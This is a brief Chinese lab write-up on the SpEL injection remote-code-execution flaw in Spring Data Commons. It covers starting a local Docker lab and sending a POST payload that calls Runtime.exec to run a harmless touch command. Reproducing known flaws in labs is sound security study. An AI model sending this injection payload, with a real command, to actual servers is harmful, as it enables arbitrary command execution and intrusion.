spring data commons RCE漏洞
Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
version:1.3.10
docker-compose up -d
该镜像拉取时间较长,执行完命令约几分钟后访问http://localhost:8080/account,出现如下即为启动成功。
更改请求方式为POST,传输payload,其中exec处为命令。payload:
name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('touch /tmp/sucess')]=test
